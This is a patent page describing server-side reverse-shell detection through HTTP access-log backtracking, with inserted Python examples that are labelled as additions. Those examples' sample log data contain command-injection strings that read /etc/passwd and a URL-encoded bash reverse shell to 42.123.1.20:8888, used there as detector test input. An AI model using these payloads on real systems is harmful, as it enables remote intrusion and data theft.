CN115801305B - Network attack detection and identification method and related equipment - Google Patents
- Publication number
- CN115801305B (application CN202211093082.XA)
- Authority
- CN
- China
- Prior art keywords
- target
- address
- port
- tcp connection
- network
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Classifications
- Y—GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
- Y02—TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
- Y02D—CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
- Y02D30/00—Reducing energy consumption in communication networks
- Y02D30/50—Reducing energy consumption in communication networks in wire-line communication networks, e.g. low power modes or reduced link rate
Landscapes
- Data Exchanges In Wide-Area Networks (AREA)
- Computer And Data Communications (AREA)
Abstract
The application discloses a network attack detection and identification method and related equipment. The method comprises the following steps: acquiring a destination port and a destination IP address from a TCP connection packet sent by a target server; and backtracking the destination port and the destination IP address in the HTTP access log to determine the network risk of the TCP connection packet. In the method provided by the embodiments of the application, network requests and traffic are monitored in real time at the server side, the TCP connection packet sent by the target server is parsed to obtain the destination port and the destination IP address, and these are compared by backtracking against the ports and IP addresses of the extranet requests recorded in the HTTP access log to determine whether the TCP connection packet carries a reverse-shell risk. This avoids the permission problem of the prior art, in which an administrator must deploy a monitoring agent on each client of the target server in bulk, removes the dependence on the many different processes a reverse shell may use, and improves the generality of the method.
Description
Technical Field
The present disclosure relates to the field of communications, and more particularly, to a method and related device for detecting and identifying a network attack.
Background
In the current monitoring method, an agent process is deployed at each client of the server, and key processes are monitored to make a risk determination. This approach cannot provide unified monitoring and network risk assessment of the clients from the server side, and because an agent process must be deployed for every client, deployment is difficult when the server has a large number of subordinate clients.
Disclosure of Invention
In the summary, a series of concepts in a simplified form are introduced, which will be further described in detail in the detailed description. The summary of the application is not intended to define the key features and essential features of the claimed subject matter, nor is it intended to be used as an aid in determining the scope of the claimed subject matter.
In order to provide a more convenient and rapid network attack detection and identification method, in a first aspect the application provides a network attack detection and identification method comprising the following steps:
acquiring a destination port and a destination IP address from a TCP connection packet sent by a target server;
and backtracking the destination port and the destination IP address in the HTTP access log to determine the network risk of the TCP connection packet.
Optionally, backtracking the destination port and the destination IP address in the HTTP access log to determine the network risk of the TCP connection packet includes:
issuing a network intrusion risk warning for the TCP connection packet when an HTTP access request with the same destination port and destination IP address exists in the HTTP access log.
Optionally, the method further comprises:
checking the destination port and destination IP address of the TCP connection packet against a locally stored preset whitelist;
and treating the TCP connection packet as carrying no network intrusion risk when the same destination port and destination IP address exist in the local preset whitelist.
Optionally, the method further comprises:
obtaining an HTTP response packet of the target server;
acquiring a source port and a source IP address from the HTTP response packet;
and performing risk identification, based on a cloud database, on the network requests sent from that source port and source IP address to build the local preset whitelist, where the cloud database comprises a whitelist and/or a blacklist of destination IP addresses and destination ports.
Optionally, the method further comprises:
acquiring the network attack frequency of other servers in the target area within a preset time period;
and adjusting the capacity of the HTTP access log based on that network attack frequency.
Optionally, the method further comprises:
counting the access frequency of the same port and/or IP address in the HTTP access log;
and adjusting the life cycle of the log entries corresponding to that port and/or IP address based on the access frequency.
Optionally, the method further comprises:
acquiring traffic change information of the target server;
and increasing the capacity of the HTTP access log when the traffic change information exceeds a preset threshold.
In a second aspect, the application further provides a device for detecting and identifying a network attack, including:
an acquisition unit, configured to acquire a destination port and a destination IP address from a TCP connection packet sent by a target server;
and a determining unit, configured to backtrack the destination port and the destination IP address in the HTTP access log to determine the network risk of the TCP connection packet.
In a third aspect, the application provides an electronic device comprising a memory, a processor and a computer program stored in the memory and executable on the processor, where the processor implements the network attack detection and identification method of any one of the first aspects when executing the computer program stored in the memory.
In a fourth aspect, the present application further proposes a computer readable storage medium having stored thereon a computer program which, when executed by a processor, implements the method for detecting and identifying a network attack according to any of the first aspects.
In summary, the network attack detection and identification method according to the embodiment of the application comprises the following steps: acquiring a destination port and a destination IP address from a TCP connection packet sent by a target server; and backtracking the destination port and the destination IP address in the HTTP access log to determine the network risk of the TCP connection packet. Network requests and traffic are monitored in real time at the server side, the TCP connection packet sent by the target server is parsed to obtain the destination port and destination IP address, and these are compared by backtracking against the ports and IP addresses of the extranet requests recorded in the HTTP access log to determine whether the TCP connection packet carries a reverse-shell risk. Because the network requests are monitored at the server side, the permission problem of the prior art, in which an administrator must deploy monitoring agents in bulk on the clients of the target server, is avoided, the dependence on the many different processes a reverse shell may use is removed, and the generality of the method is improved.
Additional advantages, objects, and features of the application will be set forth in part in the description which follows and in part will become apparent to those having ordinary skill in the art upon examination of the following or may be learned from practice of the application.
Drawings
Various other advantages and benefits will become apparent to those of ordinary skill in the art upon reading the following detailed description of the preferred embodiments. The drawings are only for purposes of illustrating the preferred embodiments and are not to be construed as limiting the specification. Also, like reference numerals are used to designate like parts throughout the figures. In the drawings:
fig. 1 is a schematic flow chart of a method for detecting and identifying network attacks according to an embodiment of the present application;
fig. 2 is a schematic diagram of a detection and identification working principle of a network attack according to an embodiment of the present application;
fig. 3 is a schematic diagram of a working principle of a server external learning module according to an embodiment of the present application;
fig. 4 is a schematic diagram of an operating principle of a reverse shell detection module according to an embodiment of the present application;
fig. 5 is a schematic structural diagram of a detection and identification device for network attack according to an embodiment of the present application;
fig. 6 is a schematic structural diagram of an electronic device for detecting and identifying a network attack according to an embodiment of the present application.
Detailed Description
In the network attack detection and identification method provided by the embodiment of the application, network requests and traffic are monitored in real time at the server side; the TCP connection packet sent by the target server is parsed to obtain the destination port and destination IP address, which are compared by backtracking against the ports and IP addresses of the extranet requests recorded in the HTTP access log to determine whether the TCP connection packet carries a reverse-shell risk. Because the network requests are monitored at the server side, the permission problem of the prior art, in which an administrator must deploy monitoring agents in bulk on the clients of the target server, is avoided, the dependence on the many different processes a reverse shell may use is removed, and the generality of the method is improved.
The terms "first," "second," "third," "fourth" and the like in the description and in the claims and in the above drawings, if any, are used for distinguishing between similar objects and not necessarily for describing a particular sequential or chronological order. It is to be understood that the data so used may be interchanged where appropriate such that the embodiments described herein may be implemented in other sequences than those illustrated or otherwise described herein. Furthermore, the terms "comprises," "comprising," and "having," and any variations thereof, are intended to cover a non-exclusive inclusion, such that a process, method, system, article, or apparatus that comprises a list of steps or elements is not necessarily limited to those steps or elements expressly listed but may include other steps or elements not expressly listed or inherent to such process, method, article, or apparatus. The following description of the embodiments of the present application will be made clearly and completely with reference to the accompanying drawings, in which it is apparent that the embodiments described are only some embodiments of the present application, but not all embodiments.
The target host is in an intranet environment and cannot be accessed directly from the extranet; it can only push a shell outward on its own initiative, which is called a reverse shell. In a reverse shell the control end listens on a TCP/UDP port, the controlled end initiates a connection to that port, and the input and output of a command line are forwarded to the control end; in essence, the client and server roles of the network model are reversed.
Referring to fig. 1, a flowchart of a method for detecting and identifying a network attack according to an embodiment of the present application may specifically include:
S110, acquiring a destination port and a destination IP address from a TCP connection packet sent by a target server;
For example, when an attacker attacks a target server, the attacker first sends an attack instruction to the target server, and that instruction contains the IP address and port to which the target server is to connect outward. If the target server connects to the IP address and port supplied by the attacker, the attacker obtains a connection to the target server and can remotely control its shell, thereby achieving the intrusion.
The solution provided by the application inspects traffic at the server side, monitors the network requests of the clients subordinate to the server, and, when a TCP connection packet is about to be sent to the extranet, parses the destination port and destination IP address out of that TCP packet.
S120, backtracking the destination port and the destination IP address in the HTTP access log to determine the network risk of the TCP connection packet.
The HTTP access log records the history of extranet access to the intranet, including the port and IP address of each visitor, and therefore also the port and IP address of the attacker. The port and IP address information recorded in the HTTP access log is compared with the destination port and destination IP address of the TCP connection packet; if they are the same, a reverse-shell event exists and the target server is very likely under attack.
In summary, the network attack detection and identification method provided by the embodiment of the application monitors network requests and traffic at the server side, parses the TCP connection packet sent by the target server to obtain the destination port and destination IP address, and compares them by backtracking against the ports and IP addresses of the extranet requests recorded in the HTTP access log to determine whether the TCP connection packet carries a reverse-shell risk. Because the traffic is monitored at the server side, the permission problem of the prior art, in which an administrator must deploy monitoring agents in bulk on the clients of the target server, is avoided, the dependence on the many different reverse-shell processes is removed, and the generality of the method is improved.
In some examples, backtracking the destination port and the destination IP address in the HTTP access log to determine the network risk of the TCP connection packet includes:
issuing a network intrusion risk warning for the TCP connection packet when an HTTP access request with the same destination port and destination IP address exists in the HTTP access log.
By way of example, the destination port and destination IP address of the TCP connection packet are compared with the IP addresses and ports recorded in the HTTP access log; if the same pair is found, a network intrusion risk warning is issued for the TCP connection packet.
For example: intranet web host 192.168.1.50 initiates a TCP request to port 8888 of external host 42.123.1.20. According to the current memory capacity of the device, a specified number of HTTP access log entries are read and backtracked, and the history log is searched for the keyword 42.123.1.20:8888; if it is present, the corresponding log entry is recorded and an alarm is pushed. If a risk exists, the network attack detection and identification record is pushed in the form shown in Table 1:
TABLE 1
The network attack detection and identification record contains the warning time, source IP, source port, destination IP, destination port, intranet asset, threat type, and the risky session sent from the extranet.
In some examples, the above method further comprises:
checking the destination port and destination IP address of the TCP connection packet against a locally stored preset whitelist;
and treating the TCP connection packet as carrying no network intrusion risk when the same destination port and destination IP address exist in the local preset whitelist.
For example, before the TCP connection packet is backtracked against the HTTP log, its destination port and destination IP address may first be checked against a preset whitelist stored locally; if the whitelist contains the same port and IP address, the TCP connection packet can be trusted and there is no network intrusion risk.
In summary, in the method provided by the embodiment of the application, before the TCP connection packet is compared against the HTTP log by backtracking, its destination port and destination IP can first be compared against the whitelist; if they fall within the preset whitelist, the TCP connection packet is passed directly.
In some examples, the above method further comprises:
obtaining an HTTP response packet of the target server;
acquiring a source port and a source IP address from the HTTP response packet;
and performing risk identification, based on a cloud database, on the network requests sent from that source port and source IP address to build the local preset whitelist, where the cloud database comprises a whitelist and/or a blacklist of destination IP addresses and destination ports.
For example, when the target server connects to the extranet, risk identification may be performed on its extranet requests according to the whitelist and/or blacklist stored in the cloud database, where the whitelist contains destination IP addresses and destination ports, and the local preset whitelist of the intranet is built from the result. For example: server external-connection learning is started, intranet host 192.168.1.50 is selected in the configuration, and the learning period is set to one day; when the server accesses a target website, the corresponding destination IP is recorded and compared with threat intelligence, and if no threat is found the IP and port are stored in the whitelist.
In summary, the method provided by the embodiment of the application can start the server external-connection learning function for a target server on demand and set the learning time range freely. Sessions that the intranet web host actively initiates to the extranet within that time range are compared with the whitelist and/or blacklist of IP addresses and destination ports in the cloud database, and the local preset whitelist is built and stored; if the destination IP carries a threat label, a threat log and an alarm are generated directly.
The HTTP access log is generally set to a fixed capacity; when the log is full, the oldest records are erased and the information for newly generated session requests is written in their place. After sending the attack instruction, an attacker can also send a sleep instruction to the client of the attacked intranet server, so that the client connects back to the attacker only after the log entry corresponding to the attack instruction has expired; the security detection based on backtracking the HTTP access log is thereby evaded and the intrusion succeeds.
To counter this, the effectiveness of the detection can be improved by any one of the following schemes A, B and C, or by a combination of several of them.
In some examples, the above method further comprises:
Scheme A:
acquiring the network attack frequency of other servers in the target area within a preset time period;
and adjusting the capacity of the HTTP access log based on that network attack frequency.
For example, the network attack frequency of other servers in the target area over a preset time period is counted; the target area may be a whole office building and the preset time period may be set to 1 hour, that is, the number of network attacks suffered by the office building in the past hour is counted as the network attack frequency. If the network attack frequency is not higher than the preset frequency, the capacity of the HTTP access log need not be adjusted; if it is higher, the capacity of the HTTP access log can be raised appropriately, and the higher the frequency, the larger the capacity, which reduces the chance that an attacker can skip the security detection by sending a sleep instruction to the client.
Scheme B:
counting the access frequency of the same port and/or IP address in the HTTP access log;
and adjusting the life cycle of the log entries corresponding to that port and/or IP address based on the access frequency.
For example, the access frequency of the same port and/or IP address in the HTTP access log is counted. If a port or IP address sends access requests frequently and is not on the whitelist, the network request carries a high risk factor and may come from an attacker probing repeatedly. The life cycle of the log entries corresponding to that port and/or IP address is adjusted according to the access frequency: when the access frequency is higher and the capacity of the HTTP access log is insufficient, other historical access entries with lower frequency are erased first.
Scheme C:
acquiring traffic change information of the target server;
and increasing the capacity of the HTTP access log when the traffic change information exceeds a preset threshold.
Traffic change information of the target server is obtained, where the traffic change information is the result of comparing the current traffic with the historical traffic for the current time period, and the historical traffic is obtained by counting how the average traffic of the target server varies over time across several calendar days; it generally shows regularity, for example more traffic during working hours and less traffic outside working hours. Under normal conditions the traffic change information does not exceed the preset threshold, that is, the daily traffic pattern should be roughly the same; when it does exceed the preset threshold, some abnormal network event may be occurring, such as an extranet attack, and the capacity of the HTTP access log is then increased, which reduces the chance that an attacker can skip the security detection by sending a sleep instruction to the client.
In summary, in the method provided by the embodiment of the application, the capacity of the access log and the life cycle of its entries are adjusted by analysing one or more of the network attack frequency, the access frequency of the same port and/or IP address, and the traffic change information. This reduces the chance that an attacker can skip the security detection by sending a sleep instruction to the client, improves the accuracy of network attack detection and identification, and improves the network security of the server.
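Schemes A, B and C above as one added Python example (not the patent's code): a bounded access log whose eviction order follows the access frequency of the client ip:port (scheme B), whose capacity grows with the area-wide attack frequency (scheme A), and whose capacity is raised when current traffic deviates from the historical pattern (scheme C). The growth factor ceil(attacks/baseline), the 50 % traffic threshold, the maximum capacity and the constructed client sequence are assumptions.

```python
"""Adaptive HTTP access-log retention: schemes A, B and C.

Added example, not the patent's code. Growth factors, thresholds and
the sample client sequence are assumptions.
"""
import math
from collections import Counter
from typing import Dict, List, Tuple


class AdaptiveAccessLog:
    """Fixed-capacity access log whose capacity and eviction order adapt to attack pressure."""

    def __init__(self, base_capacity: int, max_capacity: int = 1_000_000) -> None:
        self.base_capacity = base_capacity
        self.max_capacity = max_capacity
        self.capacity = base_capacity
        self.freq: Counter = Counter()                   # access count per client "ip:port"
        self.entries: List[Tuple[int, str, str]] = []    # (seq, client, line); seq = arrival order
        self._seq = 0

    def append(self, client: str, line: str) -> None:
        """Record one inbound HTTP request, evicting if the log is over capacity."""
        self.freq[client] += 1
        self.entries.append((self._seq, client, line))
        self._seq += 1
        self._enforce_capacity()

    def _enforce_capacity(self) -> None:
        while len(self.entries) > self.capacity:
            # Scheme B: life cycle follows access frequency. The oldest entry of the
            # least frequent client is erased first, so a source that keeps probing
            # (and is not whitelisted) stays in the log longer than one-off visitors.
            victim = min(self.entries, key=lambda e: (self.freq[e[1]], e[0]))
            self.entries.remove(victim)

    def adjust_for_attack_frequency(self, attacks_in_window: int, baseline: int) -> int:
        """Scheme A: attacks seen across the area (e.g. an office building) in the last hour.

        Not above the baseline: capacity is left unchanged. Above it: capacity grows with
        the excess, ceil(attacks/baseline) times the base capacity (factor is an assumption).
        """
        if attacks_in_window > baseline:
            factor = math.ceil(attacks_in_window / baseline)
            self.capacity = min(self.base_capacity * factor, self.max_capacity)
            self._enforce_capacity()
        return self.capacity

    def adjust_for_traffic_change(self, current_rate: float, historical_rate: float,
                                  threshold: float = 0.5) -> int:
        """Scheme C: deviation of current traffic from the same time slot on earlier days."""
        deviation = abs(current_rate - historical_rate) / historical_rate
        if deviation > threshold:   # abnormal event suspected: raise capacity (factor 2 assumed)
            self.capacity = min(max(self.capacity, 2 * self.base_capacity), self.max_capacity)
        return self.capacity

    def retained_clients(self) -> List[str]:
        return [client for _, client, _ in self.entries]


def run_demo() -> Dict[str, object]:
    log = AdaptiveAccessLog(base_capacity=4)
    # Constructed sequence: 42.123.1.20 probes four times, other clients appear once each.
    events = [
        ("42.123.1.20:8888", "GET /cgi-bin/ping?host=1.1.1.1;id"),
        ("203.0.113.7:51234", "GET /index.html"),
        ("42.123.1.20:8888", "GET /cgi-bin/ping?host=1.1.1.1;uname%20-a"),
        ("198.51.100.9:40213", "POST /login"),
        ("42.123.1.20:8888", "GET /cgi-bin/ping?host=1.1.1.1;cat%20/etc/passwd"),
        ("203.0.113.8:50001", "GET /favicon.ico"),
        ("42.123.1.20:8888", "GET /cgi-bin/ping?host=1.1.1.1;bash%20-i%20%3E%26%20/dev/tcp/42.123.1.20/8888%200%3E%261"),
    ]
    for client, line in events:
        log.append(client, line)
    retained = log.retained_clients()   # with capacity 4 only the probing client survives
    cap_quiet = log.adjust_for_attack_frequency(attacks_in_window=3, baseline=5)
    cap_wave = log.adjust_for_attack_frequency(attacks_in_window=10, baseline=5)
    cap_spike = log.adjust_for_traffic_change(current_rate=180.0, historical_rate=100.0)
    cap_normal = log.adjust_for_traffic_change(current_rate=105.0, historical_rate=100.0)
    return {"retained": retained, "cap_quiet": cap_quiet, "cap_wave": cap_wave,
            "cap_spike": cap_spike, "cap_normal": cap_normal}


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

Note that scheme B keeps the entries of the most persistent source, which is exactly the source a sleep-then-connect attacker would want evicted; scheme A and C only ever enlarge the log, so a quiet period leaves the capacity where the last adjustment put it.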
In some examples, as shown in fig. 3, early warning of network risks can be provided through an asset management module, a server external-connection learning module, a threat intelligence module, a reverse shell detection module and an alarm module. The server external-connection learning module is mainly used to mark a whitelist of external addresses and ports in combination with threat intelligence; for IPs and ports requested by the server that are not on the whitelist, log backtracking is performed, the log is decoded, and it is judged whether a related reverse-shell event exists so that a risk warning can be issued.
The asset management module can identify intranet web assets either by manual addition or passively from traffic. Web servers in the intranet are identified automatically by matching response fields of the HTTP service according to application identification and the manually configured intranet network segment. For example: the intranet segment is configured as 192.168.1.0/24, and if HTTP response data is seen in the traffic, the corresponding IP and port are recorded, such as 192.168.1.50:80.
The server external-connection learning module enables the external-connection learning function and the learning time range as required. As shown in fig. 4, the sessions that the web host actively initiates within the time range are compared with threat intelligence, and the destination IPs and destination ports are stored in the whitelist. If a destination IP carries a threat label, a threat log and an alarm are generated directly. For example: server external-connection learning is started, intranet host 192.168.1.50 is selected in the configuration with a learning period of one day, and when the server accesses http://www.baidu.com the destination IP is recorded and compared with threat intelligence, and the corresponding IP and port are stored in the whitelist.
The reverse shell detection module, once a request initiated by the web host exists, judges whether the destination IP and port are on the whitelist. As shown in fig. 4: intranet web host 192.168.1.50 initiates a TCP request to port 8888 of host 42.123.1.20. First step: check whether destination IP 42.123.1.20 and destination port 8888 are on the whitelist; if they hit the whitelist, matching ends, otherwise proceed to the next step. Second step: read a specified number of HTTP access log entries according to the current memory capacity of the device and backtrack. Third step: check whether the keyword 42.123.1.20:8888 exists in the history log; if so, record the corresponding log entry and push an alarm.
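The three-step check of the reverse shell detection module, together with the external-connection learning that builds its whitelist (the 192.168.1.50 and 42.123.1.20:8888 example above, and the learning example before it), as an added Python example; this is not code from the patent. The access-log lines, the benign destination 203.0.113.80 and the blacklisted IP 198.51.100.200 are constructed, and the threat-intelligence cloud database is reduced to a local set of IPs. The patent searches the log for the keyword ip:port; this example also accepts ip/port and "ip port" after URL-decoding (an assumption), so that a logged payload such as /dev/tcp/ip/port still matches when the attacker's HTTP source port differs from the port the reverse shell connects to.

```python
"""Reverse-shell detection by backtracking outbound TCP connects against the HTTP access log.

Added example, not code from the patent. Log lines, the benign destination
203.0.113.80 and the blacklisted IP 198.51.100.200 are constructed.
"""
import re
from collections import deque
from dataclasses import dataclass, field
from typing import Deque, Dict, Optional, Set, Tuple
from urllib.parse import unquote


@dataclass
class Alert:
    threat_type: str      # "reverse shell" or "threat-intel hit"
    intranet_asset: str   # intranet web host that initiated the outbound connection
    dst_ip: str
    dst_port: int
    evidence: str         # matching access-log line, or the reason


@dataclass
class ReverseShellDetector:
    """Gateway-side detector: whitelist check first, then HTTP access-log backtracking."""
    max_log_lines: int = 10_000                                    # bound on retained log lines
    whitelist: Set[Tuple[str, int]] = field(default_factory=set)   # learned (dst_ip, dst_port)
    blacklist_ips: Set[str] = field(default_factory=set)           # assumed local copy of cloud DB
    access_log: Deque[str] = field(init=False)

    def __post_init__(self) -> None:
        self.access_log = deque(maxlen=self.max_log_lines)

    def record_http_request(self, line: str) -> None:
        """Append one inbound (extranet -> intranet) HTTP access-log line."""
        self.access_log.append(line)

    def learn_outbound(self, asset: str, dst_ip: str, dst_port: int) -> Optional[Alert]:
        """External-connection learning: whitelist a benign destination, alert on a labelled one."""
        if dst_ip in self.blacklist_ips:
            return Alert("threat-intel hit", asset, dst_ip, dst_port, "destination IP carries a threat label")
        self.whitelist.add((dst_ip, dst_port))
        return None

    def check_outbound_connect(self, asset: str, dst_ip: str, dst_port: int,
                               lines_to_read: Optional[int] = None) -> Optional[Alert]:
        """Steps 1-3 of the detection module for one outbound TCP connect to (dst_ip, dst_port)."""
        # Step 1: a whitelist hit ends matching.
        if (dst_ip, dst_port) in self.whitelist:
            return None
        # Step 2: read a specified number of the most recent log lines (memory-bound).
        lines = list(self.access_log)
        if lines_to_read is not None:
            lines = lines[-lines_to_read:]
        # Step 3: search for the keyword ip:port. Separators "/" and " " are added here
        # (assumption) so /dev/tcp/ip/port and "nc ip port" in a URL-decoded payload match too.
        pattern = re.compile(re.escape(dst_ip) + r"[:/ ]" + str(dst_port) + r"(?!\d)")
        for line in reversed(lines):  # newest first
            if pattern.search(unquote(line)):
                return Alert("reverse shell", asset, dst_ip, dst_port, line)
        return None


# Constructed access-log lines: client ip:port, time, request line, status.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7:51234 [10/Sep/2022:10:01:02 +0800] "GET /index.html HTTP/1.1" 200',
    '42.123.1.20:8888 [10/Sep/2022:10:02:10 +0800] "GET /cgi-bin/ping?host=1.1.1.1%3B'
    'bash%20-i%20%3E%26%20/dev/tcp/42.123.1.20/8888%200%3E%261 HTTP/1.1" 500',
    '198.51.100.9:40213 [10/Sep/2022:10:03:44 +0800] "POST /login HTTP/1.1" 302',
]


def run_demo() -> Dict[str, Optional[Alert]]:
    det = ReverseShellDetector(blacklist_ips={"198.51.100.200"})
    for line in SAMPLE_ACCESS_LOG:
        det.record_http_request(line)
    asset = "192.168.1.50"
    return {
        # learning phase: the web host's own outbound sessions
        "learned": det.learn_outbound(asset, "203.0.113.80", 443),       # benign, whitelisted
        "labelled": det.learn_outbound(asset, "198.51.100.200", 443),    # threat label -> alert
        # detection phase: outbound TCP connects seen at the gateway
        "benign": det.check_outbound_connect(asset, "203.0.113.80", 443),   # whitelist hit
        "reverse_shell": det.check_outbound_connect(asset, "42.123.1.20", 8888),
        "unknown": det.check_outbound_connect(asset, "203.0.113.53", 53),   # no log evidence
    }


if __name__ == "__main__":
    for name, alert in run_demo().items():
        print(name, "->", alert.threat_type if alert else "no risk")
```

The `lines_to_read` argument is the "specified number" the patent reads according to device memory; an outbound connect to a destination that is neither whitelisted nor present in the retained log returns no alert, which is the blind spot the log-capacity schemes above are meant to narrow.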
Referring to fig. 5, an embodiment of a network attack detection and identification device according to an embodiment of the present application may include:
an acquisition unit 21, configured to acquire a destination port and a destination IP address from a TCP connection packet sent by a target server;
and a determining unit 22, configured to backtrack the destination port and the destination IP address in the HTTP access log to determine the network risk of the TCP connection packet.
As shown in fig. 6, an embodiment of the present application further provides an electronic device 300, including a memory 310, a processor 320, and a computer program 311 stored in the memory 310 and executable on the processor, where the processor 320 implements any one of the steps of the network attack detection and identification method when executing the computer program 311.
Since the electronic device described in this embodiment is the device used to implement the network attack detection and identification method of the embodiments of the present application, those skilled in the art can understand, from the method described herein, the specific implementation of the electronic device and its various variations; how the electronic device implements the method is therefore not described in detail here, and any device employed by those skilled in the art to implement the method of the embodiments of the present application falls within the scope to be protected by the present application.
In a specific implementation, the computer program 311 may implement any of the embodiments corresponding to fig. 1 when executed by a processor.
In the foregoing embodiments, the descriptions of the embodiments are focused on, and for those portions of one embodiment that are not described in detail, reference may be made to the related descriptions of other embodiments.
It will be appreciated by those skilled in the art that embodiments of the present application may be provided as a method, system, or computer program product. Accordingly, the present application may take the form of an entirely hardware embodiment, an entirely software embodiment or an embodiment combining software and hardware aspects. Furthermore, the present application may take the form of a computer program product embodied on one or more computer-usable storage media (including, but not limited to, disk storage, CD-ROM, optical storage, and the like) having computer-usable program code embodied therein.
The present application is described with reference to flowchart illustrations and/or block diagrams of methods, apparatus (systems) and computer program products according to embodiments of the application. It will be understood that each flow and/or block of the flowchart illustrations and/or block diagrams, and combinations of flows and/or blocks in the flowchart illustrations and/or block diagrams, can be implemented by computer program instructions. These computer program instructions may be provided to a processor of a general purpose computer, special purpose computer, embedded computer, or other programmable data processing apparatus to produce a machine, such that the instructions, which execute via the processor of the computer or other programmable data processing apparatus, create means for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be stored in a computer-readable memory that can direct a computer or other programmable data processing apparatus to function in a particular manner, such that the instructions stored in the computer-readable memory produce an article of manufacture including instruction means which implement the function specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be loaded onto a computer or other programmable data processing apparatus to cause a series of operational steps to be performed on the computer or other programmable apparatus to produce a computer implemented process such that the instructions which execute on the computer or other programmable apparatus provide steps for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
Embodiments of the present application also provide a computer program product comprising computer software instructions which, when run on a processing device, cause the processing device to perform a flow of detection and identification of a network attack as in the corresponding embodiment of fig. 1.
The computer program product includes one or more computer instructions. When the computer program instructions are loaded and executed on a computer, the processes or functions in accordance with embodiments of the present application are produced in whole or in part. The computer may be a general purpose computer, a special purpose computer, a computer network, or other programmable apparatus. The computer instructions may be stored in a computer-readable storage medium or transmitted from one computer-readable storage medium to another; for example, the computer instructions may be transmitted from one website, computer, server, or data center to another website, computer, server, or data center by wired (e.g., coaxial cable, fiber optic, digital subscriber line (DSL)) or wireless (e.g., infrared, radio, microwave) means. A computer readable storage medium can be any available medium accessible to a computer, or a data storage device such as a server or data center that integrates one or more available media. Usable media may be magnetic media (e.g., floppy disks, hard disks, magnetic tapes), optical media (e.g., DVDs), or semiconductor media (e.g., solid-state disks (SSDs)), among others.
It will be clear to those skilled in the art that, for convenience and brevity of description, specific working procedures of the above-described systems, apparatuses and units may refer to corresponding procedures in the foregoing method embodiments, which are not repeated herein.
In the several embodiments provided in the present application, it should be understood that the disclosed systems, devices, and methods may be implemented in other manners. For example, the apparatus embodiments described above are merely illustrative, e.g., the division of elements is merely a logical functional division, and there may be additional divisions of actual implementation, e.g., multiple elements or components may be combined or integrated into another system, or some features may be omitted, or not performed. Alternatively, the coupling or direct coupling or communication connection shown or discussed with each other may be an indirect coupling or communication connection via some interfaces, devices or units, which may be in electrical, mechanical or other form.
The units described as separate units may or may not be physically separate, and units shown as units may or may not be physical units, may be located in one place, or may be distributed over a plurality of network units. Some or all of the units may be selected according to actual needs to achieve the purpose of the solution of this embodiment.
In addition, each functional unit in the embodiments of the present application may be integrated in one processing unit, or each unit may exist alone physically, or two or more units may be integrated in one unit. The integrated units may be implemented in hardware or in software functional units.
The integrated units, if implemented in the form of software functional units and sold or used as stand-alone products, may be stored in a computer readable storage medium. Based on such understanding, the technical solution of the present application, in essence, or the part of it contributing to the prior art, or all or part of the technical solution, may be embodied in the form of a software product stored in a storage medium, including several instructions for causing a computer device (which may be a personal computer, a server, or a network device, etc.) to perform all or part of the steps of the methods of the embodiments of the present application. The aforementioned storage medium includes: a USB flash drive, a removable hard disk, a read-only memory (ROM), a random access memory (RAM), a magnetic disk, an optical disk, or other media capable of storing program code.
The above embodiments are only for illustrating the technical solution of the present application, and not for limiting it; although the application has been described in detail with reference to the foregoing embodiments, it will be understood by those of ordinary skill in the art that the technical solution described in the foregoing embodiments can be modified, or some of its technical features can be replaced by equivalents, and that such modifications and substitutions do not depart from the spirit and scope of the technical solutions of the embodiments of the present application.
Claims (5)
1. A method for detecting and identifying a network attack, comprising:
acquiring a target port and a target IP address based on a TCP connection message sent by a target server;
backtracking the target port and the target IP address according to the http access log to determine the network risk of the TCP connection message;
further comprises:
acquiring network attack frequencies of other servers in the target area within a preset time length;
adjusting the capacity of the http access log based on the network attack frequency;
further comprises:
counting the access frequency of the same port and/or IP address in the http access log;
adjusting the life cycle of the log information corresponding to the port and/or the IP address based on the access frequency;
further comprises:
acquiring flow change information of the target server;
when the flow change information exceeds a preset threshold value, the capacity of the http access log is improved;
the backtracking the target port and the target IP address according to the http access log to determine the network risk of the TCP connection message, including:
under the condition that http access requests with the same target port and target IP address exist in the http access log, network intrusion risk early warning is sent based on the TCP connection message;
further comprises:
identifying a target port and a target IP address corresponding to the TCP connection message based on a local preset white list;
and under the condition that the same target port and the same target IP address exist in the local preset white list, the TCP connection message has no network intrusion risk.
2. The method as recited in claim 1, further comprising:
obtaining an http response message of a target server;
acquiring a source port and a source IP address based on the http response message;
and carrying out risk identification on the network request sent by the source port and the source IP address based on a cloud database to acquire the local preset white list, wherein the cloud database comprises a white list and/or a black list of the target IP address and the target port.
3. A device for detecting and identifying a network attack, comprising:
the acquisition unit is used for acquiring the target port and the target IP address based on the TCP connection message sent by the target server;
the determining unit is used for backtracking the target port and the target IP address according to the http access log so as to determine the network risk of the TCP connection message;
further comprises:
acquiring network attack frequencies of other servers in the target area within a preset time length;
adjusting the capacity of the http access log based on the network attack frequency;
further comprises:
counting the access frequency of the same port and/or IP address in the http access log;
adjusting the life cycle of the log information corresponding to the port and/or the IP address based on the access frequency;
further comprises:
acquiring flow change information of the target server;
when the flow change information exceeds a preset threshold value, the capacity of the http access log is improved;
the backtracking the target port and the target IP address according to the http access log to determine the network risk of the TCP connection message, including:
under the condition that http access requests with the same target port and target IP address exist in the http access log, network intrusion risk early warning is sent based on the TCP connection message;
further comprises:
identifying a target port and a target IP address corresponding to the TCP connection message based on a local preset white list;
and under the condition that the same target port and the same target IP address exist in the local preset white list, the TCP connection message has no network intrusion risk.
